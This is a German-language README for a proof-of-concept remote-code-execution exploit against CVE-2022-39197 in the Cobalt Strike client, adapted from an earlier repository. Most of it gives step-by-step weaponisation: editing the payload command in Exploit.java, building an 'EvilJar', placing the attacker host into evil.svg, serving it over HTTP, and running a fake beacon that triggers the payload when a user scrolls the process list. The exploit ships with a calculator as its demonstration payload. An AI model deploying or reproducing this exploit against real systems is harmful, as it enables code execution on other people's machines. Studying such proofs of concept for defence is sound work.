
CVE-2022-39197 RCE POC
Dieses Projekt wurde von @its-arun übernommen und basiert auf https://github.com/its-arun/CVE-2022-39197
Als ich das Skript testete, stellte ich fest, dass das Frida-Skript die Daten nicht in der normalen Reihenfolge abfragen konnte. Die Methode bestand darin, das Frida-Skript zu modifizieren, um den Prozessnamen zu ändern.
Dank an Meister @Kai5174 für seinen Beitrag zur Nutzungsmethode.
Bearbeiten Sie den Befehl, der mit Ihrem Payload in EvilJar/src/main/java/Exploit.java ausgeführt wird. Derzeit kann nur der Taschenrechner geöffnet werden.
Mit jar erstellen: mvn clean compile assembly:single
Verschieben Sie EvilJar-1.0-jar-with-dependencies.jar aus EvilJar/target/ in den Ordner serve/
Bearbeiten Sie serve/evil.svg und ersetzen Sie [attacker]
Mit python3 -m http.server 8080 bereitstellen
Erzeugen Sie eine beacon.exe mit einer C2-Version kleiner oder gleich 4.7
Sie müssen das py-Skript unter Windows ausführen, um online zu gehen, und Gegenmaßnahmen ergreifen, wenn der Client auf die Prozessliste zugreift und den beacon.exe-Prozess sieht.
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
Der Payload wird ausgelöst, sobald der Benutzer durch die Prozessliste scrollt.
Windows

Mac

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Es gibt eine großartige detaillierte Analyse dieser Schwachstelle. https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html
Modifiziert von https://github.com/its-arun/CVE-2022-39197